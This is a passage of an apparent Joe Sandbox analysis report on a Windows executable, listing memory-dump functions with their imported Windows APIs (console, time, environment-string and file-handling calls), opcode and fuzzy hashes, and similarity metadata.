969->960 970->969 975 7ff6313ed563-7ff6313ed56a 970->975 971->960 972 7ff6313ed575 971->972 972->964 975->971
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6313ED3BB), ref: 00007FF6313ED4EC
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6313ED3BB), ref: 00007FF6313ED577
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 953036326-0
                                                                                                                                                                      • Opcode ID: 813048f28f07144688fb23e83c74998d7ce6929819ff7ff72a59b30d9d7db0ba
                                                                                                                                                                      • Instruction ID: fdd7c145344317f5d1f07ae1df0a03383aa98e7dbd1d70bfb6342dcaac63c260
                                                                                                                                                                      • Opcode Fuzzy Hash: 813048f28f07144688fb23e83c74998d7ce6929819ff7ff72a59b30d9d7db0ba
                                                                                                                                                                      • Instruction Fuzzy Hash: C1910573F1875289F7509F2598402BD2BA0BB44B98F542139DE0EA7794CF3CE942EB20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313EFB9C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _get_daylight$_isindst
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4170891091-0
                                                                                                                                                                      • Opcode ID: 81266db9261f470eac97443019771647f4442bde83bb1ca56588bed4861e4902
                                                                                                                                                                      • Instruction ID: c3c123dd5bbf6b5e5bfb73f4733de07095ae89e59ec57186e3e85e533679be36
                                                                                                                                                                      • Opcode Fuzzy Hash: 81266db9261f470eac97443019771647f4442bde83bb1ca56588bed4861e4902
                                                                                                                                                                      • Instruction Fuzzy Hash: 24514773F043128AFB28DF64C9556FD7BA9AB04398F101235DD2E82BE9DF38A9019700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313DC02C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1452418845-0
                                                                                                                                                                      • Opcode ID: 989d74823dce4e07038ae679384eaff95f144168f5a330d89d565e0032f8335b
                                                                                                                                                                      • Instruction ID: dc12c57b1a0514e16e59867661a653a792f07cee51a883b3c30f22081f78b0c3
                                                                                                                                                                      • Opcode Fuzzy Hash: 989d74823dce4e07038ae679384eaff95f144168f5a330d89d565e0032f8335b
                                                                                                                                                                      • Instruction Fuzzy Hash: C3313721E6C29381FF14AB7599523B92391AF41784F885439EA4ECB3D7DE3CB908E350
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E5510 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279662727-0
                                                                                                                                                                      • Opcode ID: bc259eb1f50762d0e4e8c4154cc1f660a24a9b6da41aa685068df7d2900645f2
                                                                                                                                                                      • Instruction ID: 46eb3b9775e3d9e365afabdfb66dcca8aec814be435129b3275b0d463cbbfcc5
                                                                                                                                                                      • Opcode Fuzzy Hash: bc259eb1f50762d0e4e8c4154cc1f660a24a9b6da41aa685068df7d2900645f2
                                                                                                                                                                      • Instruction Fuzzy Hash: 1541A167D1878283F7508B6095443A96361FF947A4F10A334EA9D83BD6DF7CAAE09710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E9E70 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                      • Opcode ID: 7dd94d5086c8e676508beb35055c37e4fc1a8f6a26676c513fea433a4812c29e
                                                                                                                                                                      • Instruction ID: a9552532084b0068c97a0e7797d3f58f23f8a86529aa329c6a535d00d2e7cde2
                                                                                                                                                                      • Opcode Fuzzy Hash: 7dd94d5086c8e676508beb35055c37e4fc1a8f6a26676c513fea433a4812c29e
                                                                                                                                                                      • Instruction Fuzzy Hash: 0AD09265F0874642FB582B7168990BC1295AF88701F00283CD9AF86397DE3DAD0DA350
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E022C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 6b7680b3bcbb8eaaf0e877e0260c2ab7d77a5c93d054cda2ecea2d07a9930033
                                                                                                                                                                      • Instruction ID: d6f9a06aed67c72d530d7136a46d087b8215f7e16d18db12c16534b107d2e5e5
                                                                                                                                                                      • Opcode Fuzzy Hash: 6b7680b3bcbb8eaaf0e877e0260c2ab7d77a5c93d054cda2ecea2d07a9930033
                                                                                                                                                                      • Instruction Fuzzy Hash: 6C510563F0938186FB689E7594006FA62D1BF44BA4F186730DD6C877C5CE3CEE01AA21
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313DBF40 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3548387204-0
                                                                                                                                                                      • Opcode ID: 90ce53634d27d81e22cbf154e0f57438c8d3f368ca913f5dc239b0012ac3f5bf
                                                                                                                                                                      • Instruction ID: 2863a064e458ce683d95dedae5a10db0bc309746ed8467a2e7973b9ff9f9dcea
                                                                                                                                                                      • Opcode Fuzzy Hash: 90ce53634d27d81e22cbf154e0f57438c8d3f368ca913f5dc239b0012ac3f5bf
                                                                                                                                                                      • Instruction Fuzzy Hash: 4911EB41E2C28382FF1577B185462F8119A4F91300F842078E95DDB3D3EE3DBA497B62
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313EAFCC Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF6313EAE49,?,?,00000000,00007FF6313EAEFE), ref: 00007FF6313EB03A
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF6313EAE49,?,?,00000000,00007FF6313EAEFE), ref: 00007FF6313EB044
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1687624791-0
                                                                                                                                                                      • Opcode ID: 6170cc4eb7f8a211f93c3058b2a6b96cbe2caf4abb4c03e26e4b27c932d2f390
                                                                                                                                                                      • Instruction ID: d3019faa26aa9da911121680e5d9ff1869f015e1265db9359d0336d3b949db5c
                                                                                                                                                                      • Opcode Fuzzy Hash: 6170cc4eb7f8a211f93c3058b2a6b96cbe2caf4abb4c03e26e4b27c932d2f390
                                                                                                                                                                      • Instruction Fuzzy Hash: 83219322F1978241FBA59761A4543791682AF847A4F046239EA3DC73CADF7CFE45A320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313EC5A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                      • Opcode ID: d2754895f39f4531699b063916d8cff08a38131cd30492f825c16e667bfad8ec
                                                                                                                                                                      • Instruction ID: 20f7248a38f673e18697962c4dd8a160ac77473da6baa0034278d6e1b67b0ae8
                                                                                                                                                                      • Opcode Fuzzy Hash: d2754895f39f4531699b063916d8cff08a38131cd30492f825c16e667bfad8ec
                                                                                                                                                                      • Instruction Fuzzy Hash: 5811C162E08B8185EB208B26A40416E6761FB84BF4F581331EE7D8B7D9CF3CE5519B00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313F2F5C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6313E966A,?,?,00000000,00007FF6313E9B5E,?,?,?,?,00007FF6313F1904,?,?,00000000), ref: 00007FF6313F2F70
                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF6313E966A,?,?,00000000,00007FF6313E9B5E,?,?,?,?,00007FF6313F1904,?,?,00000000), ref: 00007FF6313F2FDA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EnvironmentStrings$Free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3328510275-0
                                                                                                                                                                      • Opcode ID: 93accdbd0308c0dba44ebe43d660abb76d350e18a4c449a33c952948bbbf6619
                                                                                                                                                                      • Instruction ID: 32c537dcad25911972ad9e399442137ca1556fc3811defff774411ffa2136f77
                                                                                                                                                                      • Opcode Fuzzy Hash: 93accdbd0308c0dba44ebe43d660abb76d350e18a4c449a33c952948bbbf6619
                                                                                                                                                                      • Instruction Fuzzy Hash: EF018421F1D76681FB24AB16641406AB3A0AF58FE0B485234DF7D53BC9DE3CE9829340
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E7F6C Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6313E7DE9), ref: 00007FF6313E7F8F
                                                                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6313E7DE9), ref: 00007FF6313E7FA5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1707611234-0
                                                                                                                                                                      • Opcode ID: d68f7950de553b80135a58eb95c0a83578cc27c8668d7d813b27aa90448b412d
                                                                                                                                                                      • Instruction ID: e2e0e7d8c0859c6dbe5ca669161f3b6204c477f2eb80ff9650e37f1f6d3f0f5f
                                                                                                                                                                      • Opcode Fuzzy Hash: d68f7950de553b80135a58eb95c0a83578cc27c8668d7d813b27aa90448b412d
                                                                                                                                                                      • Instruction Fuzzy Hash: BF018E7291C352C2F7508B14A40123EB7A0FB81771F601235E6A9826D8DF7DD615EB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313EADBC Relevance: 3.0, APIs: 2, Instructions: 19COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF6313F3242,?,?,?,00007FF6313F327F,?,?,00000000,00007FF6313F3745,?,?,00000000,00007FF6313F3677), ref: 00007FF6313EADD2
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF6313F3242,?,?,?,00007FF6313F327F,?,?,00000000,00007FF6313F3745,?,?,00000000,00007FF6313F3677), ref: 00007FF6313EADDC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BoundaryDeleteDescriptorErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2050971199-0
                                                                                                                                                                      • Opcode ID: 92aa6fa4a4478f210322fde5844eda42a43ebcff71f72a5b298b127ef056a90d
                                                                                                                                                                      • Instruction ID: 6ed61409a3c7ccbe185513901aac016ae877e52fb5fd27be1d1bc3fc35e8608f
                                                                                                                                                                      • Opcode Fuzzy Hash: 92aa6fa4a4478f210322fde5844eda42a43ebcff71f72a5b298b127ef056a90d
                                                                                                                                                                      • Instruction Fuzzy Hash: 00E0C26AF0930783FF086BF2986517621919F88B01F846034DC2DC7352DE3C6DC96320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E7CD4 Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DirectoryErrorLastRemove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 377330604-0
                                                                                                                                                                      • Opcode ID: 6ff3d99c67922d469825cfff7fe5e58342db75af1525cbe8060fd6701dbb96da
                                                                                                                                                                      • Instruction ID: 75e56f1fa7eb79f5716a1571ce7fd59a38c0667e8d990874ad9526e1e6eb688a
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ff3d99c67922d469825cfff7fe5e58342db75af1525cbe8060fd6701dbb96da
                                                                                                                                                                      • Instruction Fuzzy Hash: 58D0C965E1C70381FB282775584543921D41F44721F501630D829D03D8DE3CAA9A2221
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E8558 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DeleteErrorFileLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2018770650-0
                                                                                                                                                                      • Opcode ID: fc8f820fc9b91dc181bea620848d5269d8dbacdd750ce58dcb7d95aa84ebb1b2
                                                                                                                                                                      • Instruction ID: fffd665ade09a523ac7a8c27459708c24c36fd53b45e4d52651056ee1e17650b
                                                                                                                                                                      • Opcode Fuzzy Hash: fc8f820fc9b91dc181bea620848d5269d8dbacdd750ce58dcb7d95aa84ebb1b2
                                                                                                                                                                      • Instruction Fuzzy Hash: 82D01265F5C703C1F71427764C4513915D46F44731F505670D03DC13D4DF3CA9492161
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D7CF0 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
